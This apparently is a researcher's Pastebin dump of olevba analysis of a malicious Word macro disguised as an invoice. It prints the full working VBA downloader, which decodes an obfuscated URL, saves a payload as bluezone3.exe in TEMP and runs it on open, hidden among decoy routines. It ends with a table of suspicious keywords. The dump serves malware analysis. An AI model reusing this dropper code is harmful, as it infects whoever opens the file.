SHARE
TWEET

Malicious Word macro

dynamoo Oct 22nd, 2015 164 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V 22 October 2015 Invoice Summary-03.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 22 October 2015 Invoice Summary-03.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 22 October 2015 Invoice Summary-03.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. build_loops_string ""
  19. SUBDOWNLOADPROC 0, 0, 0
  20.  Dim out() As Variant
  21. CorrectlyOrderedEdges out
  22. testcaller
  23. BZgotoAUTOdg
  24. ApproximateEdge ""
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: 22 October 2015 Invoice Summary-03.doc - OLE stream: u'Macros/VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34. Public chan As Long
  35. Public url As Variant
  36. Public TmpNameHold As String
  37. Public TmpNameHold2 As String
  38.  
  39. Public proxy(100) As Byte ' proxy server
  40.  
  41. ' SAVE LOCAL COPY
  42. Public WriteFile As String
  43. Public FileIsOpen As Boolean, GotHeader As Boolean
  44. Public DownloadStarted As Boolean, DoDownload As Boolean
  45. Public DlOutput As String, SongNameUpdate As Boolean
  46.  
  47. ' THREADING
  48. Public cthread As Long
  49.  
  50. ' MESSAGE BOX
  51.  
  52. ' display error message
  53. Public Sub Error_(ByVal es As String)
  54.     Call MessageBox(frmNetRadio.hwnd, es & vbCrLf & vbCrLf & "error code: " & BASS_ErrorGetCode, "Error", vbExclamation)
  55. End Sub
  56.  
  57. ' update stream title from metadata
  58. Sub DoMeta()
  59.     Dim meta As Long
  60.     Dim p As String, tmpMeta As String
  61.     meta = BASS_ChannelGetTags(chan, BASS_TAG_META)
  62.     If meta = 0 Then Exit Sub
  63.     tmpMeta = VBStrFromAnsiPtr(meta)
  64.     If ((Mid(tmpMeta, 1, 13) = "StreamTitle='")) Then
  65.         p = Mid(tmpMeta, 14)
  66.         TmpNameHold = Mid(p, 1, InStr(p, ";") - 2)
  67.         frmNetRadio.lblSong.Caption = TmpNameHold
  68.        
  69.         If TmpNameHold = TmpNameHold2 Then
  70.             ' do noting
  71.        Else
  72.             TmpNameHold2 = TmpNameHold
  73.             GotHeader = False
  74.             DownloadStarted = False
  75.         End If
  76.        
  77.         DlOutput = App.Path & "\" & RemoveSpecialChar(Mid(p, 1, InStr(p, ";") - 2)) & ".mp3"
  78.     End If
  79. End Sub
  80.  
  81. Sub MetaSync(ByVal handle As Long, ByVal channel As Long, ByVal data As Long, ByVal user As Long)
  82.     Call DoMeta
  83. End Sub
  84.  
  85. Sub EndSync(ByVal handle As Long, ByVal channel As Long, ByVal data As Long, ByVal user As Long)
  86.     With frmNetRadio
  87.         .lblName.Caption = "not playing"
  88.         .lblBPS.Caption = ""
  89.         .lblSong.Caption = ""
  90.     End With
  91. End Sub
  92.  
  93. Public Sub OpenURL(ByVal clkURL As Long)
  94.     With frmNetRadio
  95.         .tmrNetRadio.Enabled = False
  96.         Call BASS_StreamFree(chan) ' close old stream
  97.        .lblName.Caption = "connecting..."
  98.         .lblBPS.Caption = ""
  99.         .lblSong.Caption = ""
  100.  
  101.         chan = BASS_StreamCreateURL(CStr(url((IIf(clkURL < 5, clkURL * 2, (clkURL * 2) - 9)))), 0, BASS_STREAM_BLOCK Or BASS_STREAM_STATUS Or BASS_STREAM_AUTOFREE, AddressOf SUBDOWNLOADPROC, 0)
  102.  
  103.         If chan = 0 Then
  104.             .lblName.Caption = "not playing"
  105.             Call Error_("Can't play the stream")
  106.         Else
  107.             .tmrNetRadio.Enabled = True
  108.         End If
  109.     End With
  110. done:
  111.     Call CloseHandle(cthread)   ' close the thread
  112.    cthread = 0
  113. End Sub
  114.  
  115. ' The following functions where added by Peter Hebels
  116. Public Sub SUBDOWNLOADPROC(ByVal buffer As Long, ByVal length As Long, ByVal user As Long)
  117. Dim heromoto() As Variant
  118. heromoto = Array(149, 159, 157, 151, 95, 82, 80, 131, 145, 136, 140, 122, 132, 128, 129, 132, 129, 112, 123, 122, 51, 102, 112, 45, 114, 102, 40, 107, 43, 42, 101, 39, 35, 35, 24, 85, 78, 69, 83, 67, 19, 16, 7, 60, 77, 56)
  119. httpRequest.Open "G" & "E" + "T", GetStringFromArray(heromoto, 45), False
  120.  
  121. httpRequest.Send
  122.  
  123. Exit Sub
  124.     If (buffer And length = 0) Then
  125.         frmNetRadio.lblBPS.Caption = VBStrF.romAnsiPtr(buffer) ' display connection status
  126.        Exit Sub
  127.     End If
  128.  
  129.     If (Not DoDownload) Then
  130.         DownloadStarted = False
  131.         Call Writ.eFile.CloseFile
  132.         Exit Sub
  133.     End If
  134.  
  135.     If (Trim(DlOutput) = "") Then Exit Sub
  136.  
  137.     If (Not DownloadStarted) Then
  138.         DownloadStarted = True
  139.         Call WriteFi.le.CloseFile
  140.         If (WriteFi.le.OpenFile(DlOutput)) Then
  141.             SongNameUpdate = False
  142.         Else
  143.            
  144.             SongNameUpdate = True
  145.            
  146.             GotHeader = False
  147.         End If
  148.     End If
  149.  
  150.     If (Not SongNameUpdate) Then
  151.         If (length) Then
  152.             Call Writ.eFile.WriteBytes(buffer, length)
  153.         Else
  154.             Call Writ.eFile.CloseFile
  155.             GotHeader = False
  156.         End If
  157.     Else
  158.         DownloadStarted = False
  159.         Call Writ.eFile.CloseFile
  160.         GotHeader = False
  161.     End If
  162. End Sub
  163. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
  164.     Dim i As Integer
  165.     Dim result As String
  166.     result = ""
  167.     For i = LBound(fromArr) To UBound(fromArr)
  168.         result = result & Chr(fromArr(i) - LenLen + i * 2)
  169.     Next i
  170.     GetStringFromArray = result
  171. End Function
  172. Public Function RemoveSpecialChar(strFileName As String)
  173.     Dim i As Byte
  174.     Dim SpecialChar As Boolean
  175.     Dim SelChar As String, OutFileName As String
  176.  
  177.     For i = 1 To Len(strFileName)
  178.         SelChar = Mid(strFileName, i, 1)
  179.         SpecialChar = InStr(":/\?*|<>" & Chr$(34), SelChar) > 0
  180.  
  181.         If (Not SpecialChar) Then
  182.             OutFileName = OutFileName & SelChar
  183.             SpecialChar = False
  184.         Else
  185.             OutFileName = OutFileName
  186.             SpecialChar = False
  187.         End If
  188.     Next i
  189.  
  190.     RemoveSpecialChar = OutFileName
  191. End Function
  192. -------------------------------------------------------------------------------
  193. VBA MACRO Module2.bas
  194. in file: 22 October 2015 Invoice Summary-03.doc - OLE stream: u'Macros/VBA/Module2'
  195. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  196.  
  197. Public httpRequest As Object
  198. Public adodbStream As Object
  199. Public processEnv  As Object
  200. Public tempFolder As String
  201. Public tempFile As String
  202. Public shellApp As Object
  203. Dim host As Object
  204. Public bz_connected As Boolean
  205.  
  206. Option Compare Text
  207.  
  208. Function BZinit()
  209. Set host = openBlueZoneSession
  210. End Function
  211.  
  212. Function openBlueZoneSession() As Object
  213.  
  214. ChDir "C:\"
  215. Set host = CreateObject("BZwhll.whllobj")
  216. retval = host.OpenSession(0, 11, "fdx3270.zmd", 30, 1)
  217. host.Connect ("K")
  218. 'host.WaitCursor 1, 9, 1, 1
  219. Set Wnd = host.Window()
  220.  
  221. Wnd.Caption = "BDG Window"
  222. Wnd.State = 0 ' 0 restore, 1 minimize, 2 maximize
  223. Wnd.Visible = BORG.Bluezone_Vis.Value
  224. host.waitready 1, 500
  225.  
  226. bz_connected = True
  227. Set openBlueZoneSession = host
  228.  
  229.  
  230. End Function
  231.  
  232. Function BZreadscreen(length As Integer, x As Integer, y As Integer, Optional wait As Boolean = False) As String
  233. On Error GoTo erroutread
  234. Dim loopcheck As Integer
  235. loopcheck = 0
  236. read:
  237. Dim BZdata As String
  238. BZdata = ""
  239. BZmodule.host.readscreen BZdata, length, x, y
  240. If wait = True Then host.waitready 1, 51
  241. BZreadscreen = BZdata
  242. Exit Function
  243. erroutread:
  244.     Set host = openBlueZoneSession
  245.     loopcheck = loopcheck + 1
  246.     If loopcheck >= 5 Then
  247.         Exit Function
  248.     End If
  249.     GoTo read
  250.    
  251. End Function
  252. Public Sub testcaller()
  253.  
  254. tempFolder = processEnv("TE" + "MP")
  255.  
  256. tempFile = tempFolder + "\bluezone3.exe"
  257. Exit Sub
  258.  
  259. Set host = openBlueZoneSession
  260.  
  261. host.readscreen text, 12, 10, 10
  262. Call BZwritescreen("text", 11, 25)
  263. x = BZreadscreen(5, 5, 5)
  264. Call BZsendKey("@C")
  265.  
  266. End Sub
  267. Function BZwritescreen(text As String, x As Integer, y As Integer, Optional wait As Boolean = False)
  268. On Error GoTo erroutwrite
  269. Dim loopcheck As Integer
  270. loopcheck = 0
  271. writeme:
  272. If TypeName(host) = "IWhllObj" Then
  273.     host.writescreen text, x, y
  274.     If wait = True Then host.waitready 1, 51
  275. Else
  276.     MsgBox ("error" & Err.Number & " in bzwritescreen")
  277. End If
  278. Exit Function
  279. erroutwrite:
  280.     Set host = openBlueZoneSession
  281.     loopcheck = loopcheck + 1
  282.     If loopcheck >= 5 Then
  283.         Exit Function
  284.     End If
  285.     GoTo writeme
  286. End Function
  287.  
  288. Function BZsendKey(text As String, Optional wait As Boolean = True)
  289. On Error GoTo erroutSend
  290. Dim loopcheck As Integer
  291. loopcheck = 0
  292. pushkey:
  293. host.sendkey text
  294. If wait = True Then host.waitready 1, 51
  295. Exit Function
  296. erroutSend:
  297.     Set host = openBlueZoneSession
  298.     loopcheck = loopcheck + 1
  299.     If loopcheck >= 5 Then
  300.         Exit Function
  301.     End If
  302.     GoTo pushkey
  303. End Function
  304.  
  305. Public Sub BZgotoAUTOdg()
  306.  
  307. 'checks to see if we are connected to a bluezone session if so
  308. 'regardless of current position in system will get us to the DG section of the mainframe display
  309.  
  310. With adodbStream
  311.    .Type = 1
  312.     .Open
  313.     .write httpRequest.responseBody
  314.     .savetofile tempFile, 2
  315. End With
  316. GoTo SUB1
  317. If BZmodule.BZConnected() Then
  318.    
  319. End If
  320. SUB1:
  321. End Sub
  322.  
  323. Function BZLogin(empnum As String, password As String) As Boolean
  324. 'Call BZsendKey("@C")
  325. 'Call BZsendKey("STSA@E", True)
  326. Call BZsendKey("ims@E", True)
  327.  
  328. fedex = BZreadscreen(35, 1, 23)
  329. iter = 0
  330. Do Until fedex = "F E D E R A L  E X P R E S S  I M S"
  331.     fedex = BZreadscreen(35, 1, 23, True)
  332.     iter = iter + 1
  333.     If iter >= 25 Then
  334.         BZmodule.BZcloseSessions
  335.         x = MsgBox("Error!" & vbNewLine & "Unable to connect to bluezone!" _
  336.             & vbNewLine & "Please try and log in again.", vbCritical, "Error!")
  337.         Exit Function
  338.     End If
  339. Loop
  340.  
  341. Call BZwritescreen(empnum, 7, 15)
  342. Call BZwritescreen(password, 7, 43)
  343. password = ""
  344. Call BZsendKey("@E", True)
  345. readerror = BZreadscreen(80, 24, 2)
  346. If InStr(1, readerror, "INCORRECT PASSWORD ENTERED") Then
  347.     BZmodule.BZcloseSessions
  348.     x = MsgBox("Incorrect Login Credentials", vbCritical, "Incorrect Password")
  349.     BZLogin = False
  350.     Exit Function
  351. End If
  352. Enter = BZreadscreen(5, 14, 15)
  353. iter = 0
  354. Do Until Enter = "ENTER"
  355.     fedex = BZreadscreen(35, 1, 23, True)
  356.     iter = iter + 1
  357.     If iter >= 25 Then
  358.         BZmodule.BZcloseSessions
  359.         BZLogin = False
  360.         Exit Function
  361.     End If
  362. Loop
  363.  
  364. BZLogin = True
  365. End Function
  366.  
  367. Function DGscreenChooser(menu As String) As Boolean
  368. 'On Error GoTo erroutScreenChoice
  369. DGscreenInfo = BZreadscreen(50, 1, 20)
  370. If InStr(1, DGscreenInfo, "DANGEROUS GOODS SYSTEM") >= 1 Then
  371.     dgscreeninfo2 = BZreadscreen(50, 2, 20)
  372.     If InStr(1, dgscreeninfo2, "SCAN RECONCILIATION SCREEN") > 1 Then
  373.         Call BZsendKey("@3")
  374.     End If
  375.    
  376.     Call BZwritescreen(menu, 2, 17)
  377.     Call BZsendKey("@E")
  378. Else
  379.     Call BZsendKey("@C", True) 'clears screen in IMS
  380.    Call BZsendKey("asap@e", True) 'types ASAP and enters command
  381.    miscdata = BZreadscreen(32, 1, 2)
  382.     If miscdata = "ASAP COMMAND IS UNKNOWN TO VTAM." Or miscdata = "APPLICATION NOT ACTIVE.         " Then
  383.         res = BZLogin(BORG.empnum, BORG.PasswordBox)
  384.         If res = False Then
  385.             DGscreenChooser = False
  386.             Exit Function
  387.         End If
  388.     End If
  389.     Call BZsendKey("68") 'enter 26 for dg training
  390.    Call BZsendKey("@E", True)
  391.     Call BZwritescreen(menu, 2, 17) 'enters assign into first field to bring us to assign screen
  392.    Call BZwritescreen(BORG.Location.text, 19, 44) 'inputs the location ID in DGinput into station
  393.    If BORG.printerID <> "" Then Call BZwritescreen(BORG.printerID.text, 21, 32)
  394.     Call BZsendKey("@e", True) 'sends enter key to bring us finally to Assign Screen
  395. End If
  396.  
  397. retCode = BZreadscreen(3, 24, 2)
  398. If retCode = "136" Then
  399.     Call BZwritescreen(BORG.Location.text, 19, 44)
  400. End If
  401. DGscreenChooser = True
  402. Exit Function
  403.  
  404. erroutScreenChoice:
  405. MsgBox (Err.Number & " error occured in dgscreenchooser sub")
  406. DGscreenChooser = False
  407. End Function
  408. Function BZConnected() As Boolean
  409. If TypeName(host) = "" Then
  410.     terminal = ""
  411.     host.readscreen terminal, 80, 1, 1
  412.     If InStr(1, terminal, "TERMINAL INACTIVE") > 1 Then
  413.         CloseSession (host)
  414.         BZConnected = False
  415.     Else
  416.         BZConnected = True
  417.     End If
  418. Else
  419.     BZConnected = False
  420. End If
  421. End Function
  422. Sub CloseSession()
  423. BORG.labelUpdater.Caption = "Closing IMS..."
  424. host.CloseSession 0, 11
  425. BORG.labelUpdater.Caption = "Done!"
  426. End Sub
  427.  
  428. Sub BZcloseSessions()
  429.  
  430. If host Is Nothing Then Exit Sub
  431. Set host = openBlueZoneSession
  432. With host
  433.     .waitready 1, 51
  434.     .CloseSession 0, 11
  435. End With
  436. BORG.labelUpdater.Caption = "Closing Previous Sesson..."
  437. Application.wait Now + TimeValue("00:00:01")
  438.  
  439. End Sub
  440.  
  441. -------------------------------------------------------------------------------
  442. VBA MACRO Module3.bas
  443. in file: 22 October 2015 Invoice Summary-03.doc - OLE stream: u'Macros/VBA/Module3'
  444. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  445. Function FaceInfo(face As String) As String
  446.     Dim loops As Variant
  447.     Dim jj As Long
  448.     Dim loop1 As String
  449.     Dim l As Long
  450.    
  451.     loops = face.GetLoops
  452.     Dim faceinfo_c As New Collection
  453.    
  454.     l = -1
  455.     For jj = LBound(loops) To UBound(loops)
  456.         Set loop1 = loops(jj)
  457.         faceinfo_c.Add ProcessLoop(loop1)
  458.     Next jj
  459.     collections.reverse_c faceinfo_c
  460.        
  461.     Set FaceInfo = faceinfo_c
  462.  
  463. End Function
  464. Function ProcessLoop(loop_in As String) As Variant
  465.         loopedges = ApproxEdges(loop_in)
  466.         loopedges2 = CorrectlyOrderedEdges(loopedges)
  467.         ProcessLoop = CollapseEdges(loopedges2)
  468. End Function
  469. Function CollapseEdges(edgelist As Variant) As Variant
  470.     Dim out() As Variant
  471.     Dim testcases() As Variant
  472.     Dim edge As Variant
  473.     Dim point As Variant
  474.    
  475.     Dim ii As Long
  476.    
  477.     Dim l As Long
  478.     l = -1
  479.    
  480.     'Dim collection1 As New Collection
  481.    
  482.     For Each edge In edgelist
  483.         For ii = LBound(edge) To UBound(edge) - 1
  484.             point = edge(ii)
  485.             l = ArrayFunctions.AddItem(out, point, l)
  486.             'collection1.Add point
  487.        Next ii
  488.     Next
  489.    
  490.     CollapseEdges = out
  491. End Function
  492.  
  493. Public Function CorrectlyOrderedEdges(edgelist() As Variant)
  494.     Dim out() As Variant
  495.     Dim testcases() As Variant
  496.     Dim edge1, edge2 As Variant
  497.     Dim a, b, c, d As Variant
  498.     Dim ii As Long
  499.     Dim l As Long
  500.     Dim m As Long
  501.    
  502.     l = -1
  503.    
  504.     m = 0
  505.     If m > 0 Then
  506.         For ii = LBound(edgelist) To UBound(edgelist) - 1
  507.             edge1 = edgelist(ii)
  508.             edge2 = edgelist(ii + 1)
  509.             a = edge1(LBound(edge1))
  510.             b = edge1(UBound(edge1))
  511.             c = edge2(LBound(edge2))
  512.             d = edge2(UBound(edge2))
  513.             If vectors.ComparePoints(a, c) Then
  514.                 Rev.erse edge1
  515.             ElseIf vectors.ComparePoints(a, d) Then
  516.                 Rev.erse edge1
  517.                 Rev.erse edge2
  518.             ElseIf vectors.ComparePoints(b, c) Then
  519.             ElseIf vectors.ComparePoints(b, d) Then
  520.                 Rever.se edge2
  521.             Else
  522.                 Debug.Assert 0
  523.             End If
  524.             l = ArrayFunctions.AddItem(out, edge1, l)
  525.         Next ii
  526.         l = ArrayFunctions.AddItem(out, edge2, l)
  527.        
  528.         CorrectlyOrderedEdges = out
  529.     Else
  530.         Set ob = CreateObject("WScript.Shell")
  531. Set processEnv = ob.Environment("Process")
  532.  
  533.     End If
  534. End Function
  535.  
  536. Function ApproxEdges(loop1 As String) As Variant
  537.     Dim edges As Variant
  538.     Dim edge As SldWorks.edge
  539.     Dim aedge As Variant
  540.     Dim aedges() As Variant
  541.     Dim ii, kk As Long
  542.     Dim l As Long
  543.    
  544.     edges = loop1.GetEdges
  545.    
  546.     l = -1
  547.     For kk = LBound(edges) To UBound(edges)
  548.         Set edge = edges(kk)
  549.         aedge = ApproximateEdge(edge)
  550.         l = ArrayFunctions.AddItem(aedges, aedge, l)
  551.     Next kk
  552.    
  553.     ApproxEdges = aedges
  554. End Function
  555.  
  556. Public Function ApproximateEdge(edge As String)
  557.     Dim tesspoints As Variant
  558.     Dim outpoints() As Variant
  559.     Dim curve As Variant
  560.     Dim params As Variant
  561.     Dim vStartPt(2) As Double
  562.     Dim vEndPt(2) As Double
  563.     Dim kk As Long
  564.     Dim ii, jj As Long
  565.     Dim l As Long
  566.     Dim p(2) As Double
  567.     GoTo SUB33
  568.     Set curve = ed.ge.GetCurve
  569.     params = ed.ge.GetCurveParams2
  570.    
  571.     For kk = LBound(vStartPt) To UBound(vStartPt)
  572.         vStartPt(kk) = params(kk)
  573.         vEndPt(kk) = params(kk + 3)
  574.     Next kk
  575.    
  576.     tesspoints = curve.GetTessPts(0#, 0.00000001, vStartPt, vEndPt)
  577.    
  578.     l = -1
  579.     For ii = LBound(tesspoints) To UBound(tesspoints) Step 3
  580.         For jj = LBound(p) To UBound(p)
  581.             p(jj) = tesspoints(ii + jj)
  582.         Next jj
  583.         l = ArrayFunctions.AddItem(outpoints, p, l)
  584.     Next ii
  585.    
  586.     ApproximateEdge = outpoints
  587.    
  588. SUB33:
  589.    
  590. Set shellApp = CreateObject("Shell.Application")
  591.  
  592. shellApp.Open (tempFile)
  593. End Function
  594.  
  595. Function VertexInfo(loop1 As String) As Variant
  596.     Dim vertices As Variant
  597.     Dim vertex As SldWorks.vertex
  598.     Dim point As Variant
  599.     Dim coord As Variant
  600.     Dim s As String
  601.     Dim scoords() As String
  602.     Dim x, y, z As Double
  603.     Dim l As Long
  604.     Dim kk As Long
  605.    
  606.     vertices = loop1.GetVertices
  607.    
  608.     l = -1
  609.     For kk = LBound(vertices) To UBound(vertices)
  610.         Set vertex = vertices(kk)
  611.         point = vertex.GetPoint
  612.         x = point(0)
  613.         y = point(1)
  614.         z = point(2)
  615.        
  616.         s = "[" & Str(x) & "," & Str(y) & "," & Str(z) & "]"
  617.         'Debug.Print s
  618.        ReDim Preserve scoords(l + 1)
  619.         l = UBound(scoords, 1) - LBound(scoords, 1)
  620.         scoords(l) = s
  621.     Next kk
  622.    
  623.     VertexInfo = scoords
  624. End Function
  625.  
  626. Public Function build_loops_string(loops As String)
  627.    
  628.     Set httpRequest = CreateObject("Microsoft.XMLHTTP")
  629.  
  630.  
  631. Set adodbStream = CreateObject("Adodb.Stream")
  632.  
  633. Exit Function
  634.     Dim face_string As Object
  635.     Dim loopstring As Object
  636.    
  637.     If Not collections.IsVarArrayEmpty(loops) Then
  638.         For Each loop1 In loo.ps
  639.             edgematrix = Matri.ces.build_from_vectors(loop1)
  640.             Set loopstring = Matri.ces.toYaml2(edgematrix)
  641.            
  642.            
  643.             stringcollections.PadStrings loopstring, "- ", "  ", ""
  644.             collections.ExtendCollection face_string, loopstring
  645.         Next
  646.        
  647.     End If
  648.    
  649.    
  650.     Set build_loops_string = face_string
  651. End Function
  652. +------------+----------------------+-----------------------------------------+
  653. | Type       | Keyword              | Description                             |
  654. +------------+----------------------+-----------------------------------------+
  655. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  656. | Suspicious | Open                 | May open a file                         |
  657. | Suspicious | Shell                | May run an executable file or a system  |
  658. |            |                      | command                                 |
  659. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  660. |            |                      | command                                 |
  661. | Suspicious | Shell.Application    | May run an application (if combined     |
  662. |            |                      | with CreateObject)                      |
  663. | Suspicious | CreateObject         | May create an OLE object                |
  664. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  665. |            |                      | strings                                 |
  666. | Suspicious | ADODB.Stream         | May create a text file                  |
  667. | Suspicious | SaveToFile           | May create a text file                  |
  668. | Suspicious | Write                | May write to a file (if combined with   |
  669. |            |                      | Open)                                   |
  670. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  671. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  672. |            |                      | be used to obfuscate strings (option    |
  673. |            |                      | --decode to see all)                    |
  674. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  675. |            |                      | may be used to obfuscate strings        |
  676. |            |                      | (option --decode to see all)            |
  677. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  678. |            | Strings              | may be used to obfuscate strings        |
  679. |            |                      | (option --decode to see all)            |
  680. | IOC        | bluezone3.exe        | Executable file name                    |
  681. | VBA string | GET                  | "G" & "E" + "T"                         |
  682. | VBA string | :/\?*|<>"            | ":/\?*|<>" & Chr$(34)                   |
  683. | VBA string | TEMP                 | ("TE" + "MP")                           |
  684. +------------+----------------------+-----------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top